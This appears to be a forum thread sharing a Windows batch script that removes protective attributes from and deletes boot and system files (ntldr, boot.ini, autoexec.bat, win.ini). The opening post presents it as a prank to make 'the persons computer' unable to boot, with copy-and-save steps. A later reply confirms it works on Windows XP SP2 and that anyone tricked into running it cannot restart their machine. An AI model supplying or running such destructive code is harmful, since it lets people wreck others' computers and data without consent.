    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...

REMEMBER - DO NOT CLICK THIS FILE.

There no way a standard windows installation will allow you to run this bat file without giving all kinds of warnings.

Usually yes, but this bat file changes attributes and deletes windows system files. The windows file protection service detects that makes all kinds of warnings.

    ya machan u r correct
Actually it appears that I was wrong.

I just tried this on Windows XP SP2 and it worked. the Bat file deleted those files without any warnings and the machine wont boot after a restart because the ntldr was deleted.

One note : in windows I had 'Show hidden files' enabled.

    See the attached pics :

    Here goes nothing!
    match4kt9.png

    match5pp9.png

Sure enough, the files are gone!

    On Reboot:

    Well this script works!
So if you can actually get someone to run thus script on their PC, they wont be able boot the machine after a restart.
